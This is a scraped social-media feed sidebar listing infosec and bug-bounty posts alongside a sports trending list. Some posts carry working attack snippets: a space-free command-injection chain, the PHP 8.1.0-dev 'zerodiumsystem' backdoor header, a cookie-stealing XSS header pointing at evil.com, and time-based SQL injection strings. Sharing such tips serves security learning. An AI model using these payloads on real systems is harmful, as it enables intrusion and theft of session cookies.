내가 좋아할 만한 콘텐츠
🚨 Alerte #DataProtection! La plateforme pappers.fr @get_pappers expose trop de nos données personnelles. Ma signature et mon adresse sont accessibles d'un simple clic sur Google. Pourquoi ces infos sont-elles si facilement disponibles?@cnil @cnil_eu #CNIL #RGPD
I’m so sick of these dickheads. Meanwhile, I’m trying to report massive data breaches to orgs who aren’t replying because they get so much crap like Sam’s!
🧵 Welcome to Day 19 of the Secure Code Review Series! Today, we’re diving into Insufficient Logging and Monitoring—a silent but critical vulnerability that can make or break your ability to detect and respond to attacks. Let’s learn how to spot weak logging practices and…
Command injection with no spaces and no outbound? 1. base64 a complex command locally 2. {shuf,-e,"$b64",-o,$file} 3. {openssl,base64,-d,-in,$file,-out,$script} 4. {bash,$script} - gtfobins.github.io/#+file%20write #infosec #cybersec #bugbountytips
HackerOne disclosed a bug submitted by @haxta4ok: hackerone.com/reports/1618347 - Bounty: $25,000 #hackerone #bugbounty
Easy P4: Cloudflare Bypass, Origin IP Found (Part 2) sudosuraj.medium.com/easy-p4-cloudf… #bugbounty #bugbountytips #bugbountytip
sudosuraj.medium.com
Easy P4: Cloudflare Bypass, Origin IP Found (Part 2)
This is a short part 2 of Cloudflare WAF bypass, Find Origin IP techniques.
If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); Post by:- @0x0SojalSec #bugbountytips #infosec #bugbounty #bugbountytip #hacking #hacker #cybersecurity
Header based injection: X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)> X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z Referer:…
Try this powerful XSS bypass. Many WAFs have not blacklisted this event handler, so you can take advantage of it
Reverse-engineering DLLs requires the right tools to uncover vulns. 4 tools for hacking DLLs 🧵👇
Actually yes, we saw a case of that same lure earlier this week. :) Cutesy copy-pasta, I am trying to weight if it is worth a video or not 😅
try this extension to detect all types of SQLi+WAFBypass payloads just copy and try manully or you can use intruder for testing timebased sqli just set to resource pool to 1 conqurent request and check the response delay..
The client-side hackers toolkit: 1⃣ DevTools 2⃣ DOM Logger++ 3⃣ DOM Invader or EvalVillian 4⃣ de4js.kshift.me 5⃣ Humanify 6⃣ JSWZL lot's to learn!
🔥 XSS on any website with missing charset information? 😳 Attackers may leverage the ISO-2022-JP character encoding to inject arbitrary JavaScript code into a website. Read more in our latest blog post: sonarsource.com/blog/encoding-… #appsec #security #vulnerability
United States 트렌드
- 1. Delap 18.7K posts
- 2. Good Saturday 30.9K posts
- 3. GAME DAY 8,844 posts
- 4. Guiu 9,903 posts
- 5. Andrey Santos 7,515 posts
- 6. Burnley 39K posts
- 7. #UFCQatar 8,693 posts
- 8. #SaturdayVibes 4,376 posts
- 9. Chelsea 115K posts
- 10. #Caturday 3,337 posts
- 11. Enzo 36.6K posts
- 12. #MeAndTheeSeriesEP2 790K posts
- 13. #BURCHE 23.9K posts
- 14. Gittens 10.4K posts
- 15. Maresca 20.2K posts
- 16. Neto 26.5K posts
- 17. Dan Lanning N/A
- 18. Joao Pedro 7,214 posts
- 19. Chalobah 4,915 posts
- 20. Somali 88.2K posts
Something went wrong.
Something went wrong.